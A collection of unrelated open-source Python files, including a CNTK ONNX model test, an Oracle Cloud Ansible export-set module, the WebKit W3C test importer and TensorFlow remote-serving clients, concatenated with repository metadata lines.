use_external_files_to_store_parameters = use_external_files_to_store_parameters)
# CNTK evaluation fails imported ResNet110 model because of its depth.
if model_name != "ResNet110_CIFAR10_CNTK.model":
reloaded_model = C.Function.load(resave_model_path, format=C.ModelFormat.ONNX)
data_y_ = reloaded_model.eval({reloaded_model.arguments[0]:data_x})
np.testing.assert_equal(len(data_y), len(data_y_))
for i in range(len(data_y)):
np.testing.assert_equal(data_y[i].dtype, data_y_[i].dtype)
np.testing.assert_allclose(
data_y[i],
data_y_[i],
rtol=1e-3,
atol=1e-4)
verify_results_with_onnxruntime(model_name, str(os.path.abspath(tmpdir)))
rnn_base_dir = get_base_dir('rnn_models')
rnn_model_names = [dir for dir in os.listdir(rnn_base_dir)
if os.path.isfile(os.path.join(rnn_base_dir, dir)) and dir.rfind('.model') + len('.model') == len(dir)] if os.path.exists(rnn_base_dir) else []
skip_rnn_model_names = [
# ORT has a different random generator than CNTK. It will not create the same outputs.
'SmartReply.cvae_gather.model',
# SmartReply.SelfAtt.infer_model.cnt.model test requires GPU. However this test failed with both GPU and CPU test.
# skip it for now to unblock night build
'SmartReply.SelfAtt.infer_model.cnt.model'
]
verify_with_resave = [
'SmartReply.3outputs.Trained.gather.model',
'SmartReply.3outputs.Untrained.model'
]
models_with_sequential_data = [
'Speech.princeton.gather.flattened.model',
'Speech.model.lstm.900.converted.LSTMoutputW.model',
'Speech.cris.ff.model.dbn.HLast.model',
'Speech.262.cntk.model'
]
seq_models_with_sparse_data = [
'Bing.Malta50.proto1_128_gru_normv3_ep3_z.model',
'SmartReply.3outputs.Trained.gather.model',
'SmartReply.3outputs.Untrained.model',
]
non_seq_models_with_sparse_data = [
'Speech.Polyphony.DNN.FinalModel.cmf.model'
]
def verify_model(cntk_model, node_name, tmpdir, model_name, image = None, skip_round_trip_test = True,
use_external_files_to_store_parameters = False):
if (node_name is not None):
cntk_node = cntk_model.find_by_name(node_name)
if not cntk_node:
cntk_node = C.logging.depth_first_search(cntk_model, lambda x: x.uid == node_name, depth = 10)[0]
cntk_node_model = C.as_composite(cntk_node)
else:
node_name = "full"
cntk_node_model = cntk_model
sanitized_node_name = model_name + node_name.replace("/", ".")
if (image is None):
image = np.random.rand(*np.shape(cntk_model.arguments[0])).astype(np.float32)
test_model_path = os.path.join(str(tmpdir), R'test_' + sanitized_node_name)
print(test_model_path)
if os.path.exists(test_model_path):
shutil.rmtree(test_model_path, ignore_errors=True)
verify_sequence_model(cntk_node_model, image, tmpdir, sanitized_node_name, resave = not skip_round_trip_test,
use_external_files_to_store_parameters = use_external_files_to_store_parameters)
@pytest.mark.parametrize("use_external_files_to_store_parameters", (False, True))
@pytest.mark.parametrize('model_name',
[model_name for model_name in rnn_model_names],
ids=[model_name for model_name in rnn_model_names])
def test_cntk_rnn_models(model_name, use_external_files_to_store_parameters):
if model_name in skip_rnn_model_names:
pytest.skip('Skip cntk rnn model test. ')
rnn_base_dir = get_base_dir('rnn_models')
model_dir = os.path.join(rnn_base_dir, model_name)
model = C.Function.load(model_dir, format=C.ModelFormat.CNTKv2)
# Generate model-specific data
data = []
np.random.seed(0)
sequence_length = 10
if model_name == 'SmartReply.Base_BiLSTM_gather_indice_input.model':
feature_size = 99466
data.append(generate_sequence_data(1, sequence_length, feature_size, input_as_index = True))
elif model_name == 'SmartReply.SelfAtt.infer_model.cnt.model':
data = []
batch_size, seq_len = 1, 17
for arg in model.arguments[:-1]:
# data = [*data, generate_sparse_data_no_batch(seq_len, arg.shape[0])]
data.append(generate_sparse_data(batch_size, seq_len, arg.shape[0]))
# the last argument is a sequence of booleans of length 8
data.append(np.array([[[1],[0],[1],[0],[1],[1],[0],[1]]]).astype(np.float32))
elif model_name == 'Speech.lstm_pit.cntk48.ElementTimes3117.model':
batch_size, seq_len, feature_size, feature_size2, feature_size3 = 1, 17, 257, 1542, 257
data1 = np.random.rand(batch_size, seq_len, feature_size).astype(np.float32)
data2 = np.random.rand(batch_size, seq_len, feature_size2).astype(np.float32)
data3 = np.random.rand(batch_size, seq_len, feature_size3).astype(np.float32)
data = [data1, data2, data3]
elif model_name == 'LocalIntent.reduced.model':
batch_size, seq_len = 1, 3
f1, f2, f3, f4, f5 = 300, 1119, 9, 10, 12
data1 = np.random.rand(batch_size, seq_len, f1).astype(np.float32)
data2 = generate_sparse_data(batch_size, seq_len, f2)
data3 = np.random.rand(batch_size, seq_len, f3).astype(np.float32)
data4 = np.random.rand(batch_size, seq_len, f4).astype(np.float32)
data5 = np.random.rand(batch_size, seq_len, f5).astype(np.float32)
data = [data1, data2, data3, data4, data5]
else:
for arg in model.arguments:
if model_name in models_with_sequential_data:
data.append(generate_sequential_data((1,sequence_length) + arg.shape))
elif model_name in seq_models_with_sparse_data:
data.append(generate_sparse_data(1, sequence_length, arg.shape[0]))
elif model_name in non_seq_models_with_sparse_data:
data.append(generate_sparse_data_non_seq(1, arg.shape[0]))
else:
data.append(generate_sequence_data(1, sequence_length, arg.shape[0]))
# Validate model results
test_name = model_name + "_ext_" if use_external_files_to_store_parameters else model_name;
if(model_name in verify_with_resave):
verify_model(model, None, tmpdir, test_name, data[0] if len(data) == 1 else data , True,
use_external_files_to_store_parameters = use_external_files_to_store_parameters)
else:
save_onnx_model_with_validation_data(tmpdir, model, data[0] if len(data) == 1 else data, test_name, device=None,
use_external_files_to_store_parameters = use_external_files_to_store_parameters)
verify_results_with_onnxruntime(test_name, str(os.path.abspath(tmpdir)))
|
library/oci_export_set.py | slmjy/oci-ansible-modules | 106 | 11089549 | <reponame>slmjy/oci-ansible-modules
#!/usr/bin/python
# Copyright (c) 2018, Oracle and/or its affiliates.
# This software is made available to you under the terms of the GPL 3.0 license or the Apache 2.0 license.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Apache License v2.0
# See LICENSE.TXT for details.
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
"metadata_version": "1.1",
"status": ["preview"],
"supported_by": "community",
}
DOCUMENTATION = """
---
module: oci_export_set
short_description: Update a Export Set in OCI Filesystem Service.
description:
- Update an OCI Export Set, if present, with a new display name
- Update an OCI Export Set, if present, with new max_fs_stat_bytes
- Update an OCI Export Set, if present, with new max_fs_stat_files
version_added: "2.5"
options:
export_set_id:
description: Identifier of the existing Export Set which required to be updated.
required: false
aliases: ['id']
display_name:
description: A user-friendly name. It does not have to be unique, and it is changeable. Avoid entering confidential
information.
required: false
max_fs_stat_bytes:
description: Controls the maximum tbytes, fbytes, and abytes values reported by NFS FSSTAT calls through any associated
mount targets. This is an advanced feature. For most applications, use the default value. The tbytes value
reported by FSSTAT will be max_fs_stat_bytes. The value of fbytes and abytes will be max_fs_stat_bytes minus the
metered size of the file system. If the metered size is larger than max_fs_stat_bytes, then fbytes and abytes
will both be '0'.
required: false
max_fs_stat_files:
description: Controls the maximum ffiles, ffiles, and afiles values reported by NFS FSSTAT calls through any associated
mount targets. This is an advanced feature. For most applications, use the default value. The tfiles value
reported by FSSTAT will be max_fs_stat_files. The value of ffiles and afiles will be max_fs_stat_files minus the
metered size of the file system. If the metered size is larger than max_fs_stat_files, then ffiles and afiles
will both be '0'.
required: false
state:
description: Update Export Set. For I(state=present), it gets updated.
required: false
default: 'present'
choices: ['present']
author:
- "<NAME>(@debayan_gupta)"
extends_documentation_fragment: [ oracle, oracle_wait_options ]
"""
EXAMPLES = """
# Note: These examples do not set authentication details.
# Update Export Set's display name
- name: Update Export Set's display name
oci_export_set:
export_set_id: 'ocid1.exportset.oc1..xxxxxEXAMPLExxxxx'
display_name: 'updated_ansible_export_set'
state: 'present'
# Update Export Set's max_fs_stat_bytes
- name: Update Export Set's max_fs_stat_bytes
oci_export_set:
export_set_id: 'ocid1.exportset.oc1..xxxxxEXAMPLExxxxx'
max_fs_stat_bytes: 9223372036854775806
state: 'present'
# Update Export Set's max_fs_stat_files
- name: Update Export Set's max_fs_stat_files
oci_export_set:
export_set_id: 'ocid1.exportset.oc1..xxxxxEXAMPLExxxxx'
max_fs_stat_files: 9223372036854775806
state: 'present'
"""
RETURN = """
export_set:
description: Attributes of the updated Export Set.
returned: success
type: complex
contains:
compartment_id:
description: The identifier of the compartment containing the Export Set
returned: always
type: string
sample: ocid1.compartment.oc1.xzvf..xxxxxEXAMPLExxxxx
availability_domain:
description: The availability domain the Export Set is in.
returned: always
type: string
sample: IwGV:US-EXAMPLE-AD-1
display_name:
description: The user-friendly name for the Export Set.
returned: always
type: string
sample: ansible-file-system
id:
description: The identifier of the Export Set
returned: always
type: string
sample: ocid1.exportset.oc1.xzvf..xxxxxEXAMPLExxxxx
lifecycle_state:
description: The current state of the Export Set.
returned: always
type: string
sample: ACTIVE
max_fs_stat_bytes:
description: Controls the maximum tbytes, fbytes, and abytes values reported by NFS FSSTAT calls
through any associated mount targets. This is an advanced feature. For most applications,
use the default value. The tbytes value reported by FSSTAT will be max_fs_stat_bytes. The
value of fbytes and abytes will be max_fs_stat_bytes minus the metered size of the file
system. If the metered size is larger than max_fs_stat_bytes, then fbytes and abytes
will both be '0'.
returned: always
type: int
sample: 9223372036854775807
max_fs_stat_files:
description: Controls the maximum tfiles, ffiles, and afiles values reported by NFS FSSTAT calls
through any associated mount targets. This is an advanced feature. For most applications,
use the default value. The tfiles value reported by FSSTAT will be max_fs_stat_files. The
value of ffiles and afiles will be max_fs_stat_files minus the metered size of the file
system. If the metered size is larger than max_fs_stat_files, then ffiles and afiles
will both be '0'.
returned: always
type: int
sample: 9223372036854775807
time_created:
description: Date and time when the Export Set was created, in
the format defined by RFC3339
returned: always
type: datetime
sample: 2018-10-19T18:17:03.907000+00:00
vcn_id:
description: The identifier of the virtual cloud network (VCN) the export set is in.
returned: always
type: string
sample: ocid1.vcn.oc1.xzvf..xxxxxEXAMPLExxxxx
sample: {
"availability_domain":"IwGV:US-EXAMPLE-AD-1",
"compartment_id":"ocid1.compartment.oc1..xxxxxEXAMPLExxxxx",
"display_name":"ansible_export_set",
"id":"ocid1.exportset.oc1.iad.xxxxxEXAMPLExxxxx",
"lifecycle_state":"ACTIVE",
"max_fs_stat_bytes":9223372036854775807,
"max_fs_stat_files":9223372036854775807,
"time_created":"2018-10-19T18:17:03.907000+00:00",
"vcn_id":"ocid1.vcn.oc1.iad.xxxxxEXAMPLExxxxx"
}
"""
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.oracle import oci_utils
try:
from oci.file_storage.file_storage_client import FileStorageClient
from oci.exceptions import ServiceError, ClientError
from oci.file_storage.models import UpdateExportSetDetails
HAS_OCI_PY_SDK = True
except ImportError:
HAS_OCI_PY_SDK = False
def update_export_set(file_storage_client, module):
result = dict(changed=False, export_set="")
try:
result = oci_utils.check_and_update_resource(
resource_type="export_set",
get_fn=file_storage_client.get_export_set,
kwargs_get={"export_set_id": module.params["export_set_id"]},
update_fn=file_storage_client.update_export_set,
client=file_storage_client,
primitive_params_update=["export_set_id"],
kwargs_non_primitive_update={
UpdateExportSetDetails: "update_export_set_details"
},
module=module,
update_attributes=UpdateExportSetDetails().attribute_map,
)
except ServiceError as ex:
get_logger().error("Unable to update Export Set due to: %s", ex.message)
module.fail_json(msg=ex.message)
except ClientError as ex:
get_logger().error("Unable to update Export Set due to: %s", str(ex))
module.fail_json(msg=str(ex))
return result
def set_logger(input_logger):
global logger
logger = input_logger
def get_logger():
return logger
def main():
logger = oci_utils.get_logger("oci_export_set")
set_logger(logger)
module_args = oci_utils.get_common_arg_spec(supports_wait=True)
module_args.update(
dict(
max_fs_stat_bytes=dict(type=int, required=False),
max_fs_stat_files=dict(type=int, required=False),
export_set_id=dict(type="str", required=False, aliases=["id"]),
display_name=dict(type="str", required=False),
state=dict(
type="str", required=False, default="present", choices=["present"]
),
)
)
module = AnsibleModule(argument_spec=module_args)
if not HAS_OCI_PY_SDK:
module.fail_json(msg="oci python sdk required for this module")
file_storage_client = oci_utils.create_service_client(module, FileStorageClient)
state = module.params["state"]
if state == "present":
result = update_export_set(file_storage_client, module)
module.exit_json(**result)
if __name__ == "__main__":
main()
|
teuthology/test/test_contextutil.py | varshar16/teuthology | 117 | 11089561 | from pytest import raises
from teuthology import contextutil
from logging import ERROR
class TestSafeWhile(object):
def setup(self):
contextutil.log.setLevel(ERROR)
self.fake_sleep = lambda s: True
self.s_while = contextutil.safe_while
def test_6_5_10_deal(self):
with raises(contextutil.MaxWhileTries):
with self.s_while(_sleeper=self.fake_sleep) as proceed:
while proceed():
pass
def test_6_0_1_deal(self):
with raises(contextutil.MaxWhileTries) as error:
with self.s_while(
tries=1,
_sleeper=self.fake_sleep
) as proceed:
while proceed():
pass
assert 'waiting for 6 seconds' in str(error)
def test_1_0_10_deal(self):
with raises(contextutil.MaxWhileTries) as error:
with self.s_while(
sleep=1,
_sleeper=self.fake_sleep
) as proceed:
while proceed():
pass
assert 'waiting for 10 seconds' in str(error)
def test_6_1_10_deal(self):
with raises(contextutil.MaxWhileTries) as error:
with self.s_while(
increment=1,
_sleeper=self.fake_sleep
) as proceed:
while proceed():
pass
assert 'waiting for 105 seconds' in str(error)
def test_action(self):
with raises(contextutil.MaxWhileTries) as error:
with self.s_while(
action='doing the thing',
_sleeper=self.fake_sleep
) as proceed:
while proceed():
pass
assert "'doing the thing' reached maximum tries" in str(error)
def test_no_raise(self):
with self.s_while(_raise=False, _sleeper=self.fake_sleep) as proceed:
while proceed():
pass
assert True
|
third_party/WebKit/Tools/Scripts/webkitpy/w3c/test_importer.py | google-ar/chromium | 777 | 11089572 | <filename>third_party/WebKit/Tools/Scripts/webkitpy/w3c/test_importer.py
# Copyright (C) 2013 Adobe Systems Incorporated. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
# 2. Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials
# provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDER "AS IS" AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
# TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF
# THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
# SUCH DAMAGE.
"""Logic for converting and copying files from a W3C repo.
This module is responsible for modifying and copying a subset of the tests from
a local W3C repository source directory into a destination directory.
"""
import logging
import mimetypes
import os
import re
from webkitpy.common.webkit_finder import WebKitFinder
from webkitpy.layout_tests.models.test_expectations import TestExpectationParser
from webkitpy.w3c.test_parser import TestParser
from webkitpy.w3c.test_converter import convert_for_webkit
# Maximum length of import path starting from top of source repository.
# This limit is here because the Windows builders cannot create paths that are
# longer than the Windows max path length (260). See http://crbug.com/609871.
MAX_PATH_LENGTH = 125
_log = logging.getLogger(__name__)
class TestImporter(object):
def __init__(self, host, source_repo_path, dest_dir_name='external'):
"""Initializes variables to prepare for copying and converting files.
Args:
source_repo_path: Path to the local checkout of a WPT
"""
self.host = host
assert self.host.filesystem.exists(source_repo_path)
self.source_repo_path = source_repo_path
self.dest_dir_name = dest_dir_name
self.filesystem = self.host.filesystem
self.webkit_finder = WebKitFinder(self.filesystem)
self._webkit_root = self.webkit_finder.webkit_base()
self.layout_tests_dir = self.webkit_finder.path_from_webkit_base('LayoutTests')
self.destination_directory = self.filesystem.normpath(
self.filesystem.join(
self.layout_tests_dir,
dest_dir_name,
self.filesystem.basename(self.source_repo_path)))
self.import_in_place = (self.source_repo_path == self.destination_directory)
self.dir_above_repo = self.filesystem.dirname(self.source_repo_path)
self.import_list = []
# This is just a FYI list of CSS properties that still need to be prefixed,
# which may be output after importing.
self._prefixed_properties = {}
def do_import(self):
_log.info("Importing %s into %s", self.source_repo_path, self.destination_directory)
self.find_importable_tests()
self.import_tests()
def find_importable_tests(self):
"""Walks through the source directory to find what tests should be imported.
This function sets self.import_list, which contains information about how many
tests are being imported, and their source and destination paths.
"""
paths_to_skip = self.find_paths_to_skip()
for root, dirs, files in self.filesystem.walk(self.source_repo_path):
cur_dir = root.replace(self.dir_above_repo + '/', '') + '/'
_log.info(' scanning ' + cur_dir + '...')
total_tests = 0
reftests = 0
jstests = 0
# Files in 'tools' are not for browser testing, so we skip them.
# See: http://testthewebforward.org/docs/test-format-guidelines.html#tools
dirs_to_skip = ('.git', 'test-plan', 'tools')
# We copy all files in 'support', including HTML without metadata.
# See: http://testthewebforward.org/docs/test-format-guidelines.html#support-files
dirs_to_include = ('resources', 'support')
if dirs:
for name in dirs_to_skip:
if name in dirs:
dirs.remove(name)
for path in paths_to_skip:
path_base = path.replace(self.dest_dir_name + '/', '')
path_base = path_base.replace(cur_dir, '')
path_full = self.filesystem.join(root, path_base)
if path_base in dirs:
dirs.remove(path_base)
if self.import_in_place:
_log.info(" pruning %s", path_base)
self.filesystem.rmtree(path_full)
else:
_log.info(" skipping %s", path_base)
copy_list = []
for filename in files:
path_full = self.filesystem.join(root, filename)
path_base = path_full.replace(self.source_repo_path + '/', '')
path_base = self.destination_directory.replace(self.layout_tests_dir + '/', '') + '/' + path_base
if path_base in paths_to_skip:
if self.import_in_place:
_log.info(" pruning %s", path_base)
self.filesystem.remove(path_full)
continue
else:
continue
# FIXME: This block should really be a separate function, but the early-continues make that difficult.
if filename.startswith('.') or filename.endswith('.pl'):
# The w3cs repos may contain perl scripts, which we don't care about.
continue
if filename == 'OWNERS' or filename == 'reftest.list':
# These files fail our presubmits.
# See http://crbug.com/584660 and http://crbug.com/582838.
continue
fullpath = self.filesystem.join(root, filename)
mimetype = mimetypes.guess_type(fullpath)
if ('html' not in str(mimetype[0]) and
'application/xhtml+xml' not in str(mimetype[0]) and
'application/xml' not in str(mimetype[0])):
copy_list.append({'src': fullpath, 'dest': filename})
continue
if self.filesystem.basename(root) in dirs_to_include:
copy_list.append({'src': fullpath, 'dest': filename})
continue
test_parser = TestParser(fullpath, self.host)
test_info = test_parser.analyze_test()
if test_info is None:
copy_list.append({'src': fullpath, 'dest': filename})
continue
if self.path_too_long(path_full):
_log.warning('%s skipped due to long path. '
'Max length from repo base %d chars; see http://crbug.com/609871.',
path_full, MAX_PATH_LENGTH)
continue
if 'reference' in test_info.keys():
test_basename = self.filesystem.basename(test_info['test'])
# Add the ref file, following WebKit style.
# FIXME: Ideally we'd support reading the metadata
# directly rather than relying on a naming convention.
# Using a naming convention creates duplicate copies of the
# reference files (http://crrev.com/268729).
ref_file = self.filesystem.splitext(test_basename)[0] + '-expected'
# Make sure to use the extension from the *reference*, not
# from the test, because at least flexbox tests use XHTML
# references but HTML tests.
ref_file += self.filesystem.splitext(test_info['reference'])[1]
if not self.filesystem.exists(test_info['reference']):
_log.warning('%s skipped because ref file %s was not found.',
path_full, ref_file)
continue
if self.path_too_long(path_full.replace(filename, ref_file)):
_log.warning('%s skipped because path of ref file %s would be too long. '
'Max length from repo base %d chars; see http://crbug.com/609871.',
path_full, ref_file, MAX_PATH_LENGTH)
continue
reftests += 1
total_tests += 1
copy_list.append({'src': test_info['reference'], 'dest': ref_file,
'reference_support_info': test_info['reference_support_info']})
copy_list.append({'src': test_info['test'], 'dest': filename})
elif 'jstest' in test_info.keys():
jstests += 1
total_tests += 1
copy_list.append({'src': fullpath, 'dest': filename, 'is_jstest': True})
if copy_list:
# Only add this directory to the list if there's something to import
self.import_list.append({'dirname': root, 'copy_list': copy_list,
'reftests': reftests, 'jstests': jstests, 'total_tests': total_tests})
def find_paths_to_skip(self):
paths_to_skip = set()
port = self.host.port_factory.get()
w3c_import_expectations_path = self.webkit_finder.path_from_webkit_base('LayoutTests', 'W3CImportExpectations')
w3c_import_expectations = self.filesystem.read_text_file(w3c_import_expectations_path)
parser = TestExpectationParser(port, all_tests=(), is_lint_mode=False)
expectation_lines = parser.parse(w3c_import_expectations_path, w3c_import_expectations)
for line in expectation_lines:
if 'SKIP' in line.expectations:
if line.specifiers:
_log.warning("W3CImportExpectations:%s should not have any specifiers", line.line_numbers)
continue
paths_to_skip.add(line.name)
return paths_to_skip
def import_tests(self):
"""Reads |self.import_list|, and converts and copies files to their destination."""
total_imported_tests = 0
total_imported_reftests = 0
total_imported_jstests = 0
for dir_to_copy in self.import_list:
total_imported_tests += dir_to_copy['total_tests']
total_imported_reftests += dir_to_copy['reftests']
total_imported_jstests += dir_to_copy['jstests']
if not dir_to_copy['copy_list']:
continue
orig_path = dir_to_copy['dirname']
relative_dir = self.filesystem.relpath(orig_path, self.source_repo_path)
dest_dir = self.filesystem.join(self.destination_directory, relative_dir)
if not self.filesystem.exists(dest_dir):
self.filesystem.maybe_make_directory(dest_dir)
copied_files = []
for file_to_copy in dir_to_copy['copy_list']:
copied_file = self.copy_file(file_to_copy, dest_dir)
if copied_file:
copied_files.append(copied_file)
_log.info('')
_log.info('Import complete')
_log.info('')
_log.info('IMPORTED %d TOTAL TESTS', total_imported_tests)
_log.info('Imported %d reftests', total_imported_reftests)
_log.info('Imported %d JS tests', total_imported_jstests)
_log.info('Imported %d pixel/manual tests', total_imported_tests - total_imported_jstests - total_imported_reftests)
_log.info('')
if self._prefixed_properties:
_log.info('Properties needing prefixes (by count):')
for prefixed_property in sorted(self._prefixed_properties, key=lambda p: self._prefixed_properties[p]):
_log.info(' %s: %s', prefixed_property, self._prefixed_properties[prefixed_property])
def copy_file(self, file_to_copy, dest_dir):
"""Converts and copies a file, if it should be copied.
Args:
file_to_copy: A dict in a file copy list constructed by
find_importable_tests, which represents one file to copy, including
the keys:
"src": Absolute path to the source location of the file.
"destination": File name of the destination file.
And possibly also the keys "reference_support_info" or "is_jstest".
dest_dir: Path to the directory where the file should be copied.
Returns:
The path to the new file, relative to the Blink root (//third_party/WebKit).
"""
source_path = self.filesystem.normpath(file_to_copy['src'])
dest_path = self.filesystem.join(dest_dir, file_to_copy['dest'])
if self.filesystem.isdir(source_path):
_log.error('%s refers to a directory', source_path)
return None
if not self.filesystem.exists(source_path):
_log.error('%s not found. Possible error in the test.', source_path)
return None
reference_support_info = file_to_copy.get('reference_support_info') or None
if not self.filesystem.exists(self.filesystem.dirname(dest_path)):
if not self.import_in_place:
self.filesystem.maybe_make_directory(self.filesystem.dirname(dest_path))
relpath = self.filesystem.relpath(dest_path, self.layout_tests_dir)
# FIXME: Maybe doing a file diff is in order here for existing files?
# In other words, there's no sense in overwriting identical files, but
# there's no harm in copying the identical thing.
_log.info(' %s', relpath)
if self.should_try_to_convert(file_to_copy, source_path, dest_dir):
converted_file = convert_for_webkit(
dest_dir, filename=source_path,
reference_support_info=reference_support_info,
host=self.host)
for prefixed_property in converted_file[0]:
self._prefixed_properties.setdefault(prefixed_property, 0)
self._prefixed_properties[prefixed_property] += 1
self.filesystem.write_text_file(dest_path, converted_file[1])
else:
if not self.import_in_place:
self.filesystem.copyfile(source_path, dest_path)
if self.filesystem.read_binary_file(source_path)[:2] == '#!':
self.filesystem.make_executable(dest_path)
return dest_path.replace(self._webkit_root, '')
@staticmethod
def should_try_to_convert(file_to_copy, source_path, dest_dir):
"""Checks whether we should try to modify the file when importing."""
if file_to_copy.get('is_jstest', False):
return False
# Conversion is not necessary for any tests in wpt now; see http://crbug.com/654081.
# Note, we want to move away from converting files, see http://crbug.com/663773.
if re.search(r'[/\\]external[/\\]wpt[/\\]', dest_dir):
return False
# Only HTML, XHTML and CSS files should be converted.
mimetype, _ = mimetypes.guess_type(source_path)
return mimetype in ('text/html', 'application/xhtml+xml', 'text/css')
def path_too_long(self, source_path):
"""Checks whether a source path is too long to import.
Args:
Absolute path of file to be imported.
Returns:
True if the path is too long to import, False if it's OK.
"""
path_from_repo_base = os.path.relpath(source_path, self.source_repo_path)
return len(path_from_repo_base) > MAX_PATH_LENGTH
|
corehq/apps/aggregate_ucrs/urls.py | dimagilg/commcare-hq | 471 | 11089595 | <reponame>dimagilg/commcare-hq
from django.conf.urls import url
from . import views
# these are included by the userreports urls
urlpatterns = [
url(r'^view/(?P<table_id>[\w-]+)/$', views.AggregateUCRView.as_view(),
name=views.AggregateUCRView.urlname),
url(r'^preview/(?P<table_id>[\w-]+)/$', views.PreviewAggregateUCRView.as_view(),
name=views.PreviewAggregateUCRView.urlname),
url(r'^export/(?P<table_id>[\w-]+)/$', views.export_aggregate_ucr,
name='export_aggregate_ucr'),
url(r'^rebuild/(?P<table_id>[\w-]+)/$', views.rebuild_aggregate_ucr,
name='rebuild_aggregate_ucr'),
]
|
libs/pipeline_logger/pipeline_logger/__init__.py | silentmonk/KubeFlow | 2,527 | 11089615 | <filename>libs/pipeline_logger/pipeline_logger/__init__.py
from logging import Logger
from datetime import datetime
import json
from typing import Callable
__version__ = "1.0.2"
# TODO: Handle batched inputs and outputs (using above custom fn's - match inputs to outputs!)
# TODO: Add Monitors around these calls!!
class log(object):
def __init__(self,
labels: dict,
logger: Logger,
custom_inputs_fn: Callable=None,
custom_outputs_fn: Callable=None):
self._labels = labels
self._logger = logger
self._custom_inputs_fn = custom_inputs_fn
self._custom_outputs_fn = custom_outputs_fn
def __call__(self, function):
def wrapped_function(*args: bytes):
log_dict = {
'log_labels': self._labels,
'log_inputs': str(args),
}
if self._custom_inputs_fn:
custom_inputs = self._custom_inputs_fn(*args),
log_dict['log_custom_inputs'] = custom_inputs
outputs = function(*args)
log_dict['log_outputs'] = outputs
if self._custom_outputs_fn:
custom_outputs = self._custom_outputs_fn(outputs)
log_dict['log_custom_outputs'] = custom_outputs
self._logger.info(json.dumps(log_dict))
return outputs
return wrapped_function
|
cvnets/layers/activation/leaky_relu.py | apple/ml-cvnets | 209 | 11089622 | <gh_stars>100-1000
#
# For licensing see accompanying LICENSE file.
# Copyright (C) 2022 Apple Inc. All Rights Reserved.
#
from torch import nn, Tensor
from typing import Tuple, Optional
from . import register_act_fn
@register_act_fn(name="leaky_relu")
class LeakyReLU(nn.LeakyReLU):
"""
Applies a leaky relu function. See `Rectifier Nonlinearities Improve Neural Network Acoustic Models`
for more details.
"""
def __init__(
self, negative_slope: Optional[float] = 1e-2, inplace: Optional[bool] = False
) -> None:
super().__init__(negative_slope=negative_slope, inplace=inplace)
def profile_module(self, input: Tensor) -> Tuple[Tensor, float, float]:
return input, 0.0, 0.0
|
baseline/tf/remote.py | sagnik/baseline | 241 | 11089650 | import numpy as np
from baseline.remote import (
RemoteModelREST,
RemoteModelGRPC,
register_remote,
RemoteRESTClassifier,
RemoteRESTTagger,
RemoteRESTSeq2Seq,
RemoteRESTEmbeddings,
RemoteGRPCClassifier,
RemoteGRPCTagger,
RemoteGRPCSeq2Seq,
RemoteGRPCEmbeddings,
)
class RemoteRESTTensorFlowMixin(RemoteModelREST):
def create_request(self, examples):
inputs = {}
for feature in self.input_keys:
tensor = examples[feature]
if isinstance(tensor, np.ndarray):
inputs[feature] = tensor.tolist()
else:
inputs[feature] = tensor
request = {'signature_name': self.signature, 'inputs': inputs}
return request
@register_remote('http-classify')
class RemoteRESTTensorFlowClassifier(RemoteRESTTensorFlowMixin, RemoteRESTClassifier): pass
@register_remote('http-tagger')
class RemoteRESTTensorFlowTagger(RemoteRESTTensorFlowMixin, RemoteRESTTagger): pass
@register_remote('http-seq2seq')
class RemoteRESTTensorFlowSeq2Seq(RemoteRESTTensorFlowMixin, RemoteRESTSeq2Seq): pass
@register_remote('http-servable-embeddings')
class RemoteRESTTensorFlowEmbeddings(RemoteRESTTensorFlowMixin, RemoteRESTEmbeddings): pass
@register_remote('grpc')
class RemoteGRPCTensorFlowMixin(RemoteModelGRPC): pass
@register_remote('grpc-classify')
class RemoteGRPCTensorFlowClassifier(RemoteGRPCTensorFlowMixin, RemoteGRPCClassifier): pass
@register_remote('grpc-tagger')
class RemoteGRPCTensorFlowTagger(RemoteGRPCTensorFlowMixin, RemoteGRPCTagger): pass
@register_remote('grpc-seq2seq')
class RemoteGRPCTensorFlowSeq2Seq(RemoteGRPCTensorFlowMixin, RemoteGRPCSeq2Seq): pass
@register_remote('grpc-servable-embeddings')
class RemoteGRPCTensorFlowEmbeddings(RemoteGRPCTensorFlowMixin, RemoteGRPCEmbeddings): pass
@register_remote('grpc-preproc')
class RemoteGRPCTensorFlowPreprocMixin(RemoteModelGRPC):
def create_request(self, examples):
# TODO: Remove TF dependency client side
import tensorflow as tf
request = self.predictpb.PredictRequest()
request.model_spec.name = self.name
request.model_spec.signature_name = self.signature
if self.version is not None:
request.model_spec.version.value = self.version
for key in examples:
if key.endswith('lengths'):
shape = examples[key].shape
tensor_proto = tf.contrib.util.make_tensor_proto(examples[key], shape=shape, dtype=tf.int32)
request.inputs[key].CopyFrom(
tensor_proto
)
else:
request.inputs[key].CopyFrom(
tf.contrib.util.make_tensor_proto(examples[key], shape=[len(examples[key]), 1])
)
return request
@register_remote('grpc-preproc-classify')
class RemoteGRPCTensorFlowPreprocClassifier(RemoteGRPCTensorFlowPreprocMixin, RemoteGRPCClassifier): pass
@register_remote('grpc-preproc-tagger')
class RemoteGRPCTensorFlowPreprocTagger(RemoteGRPCTensorFlowPreprocMixin, RemoteGRPCTagger): pass
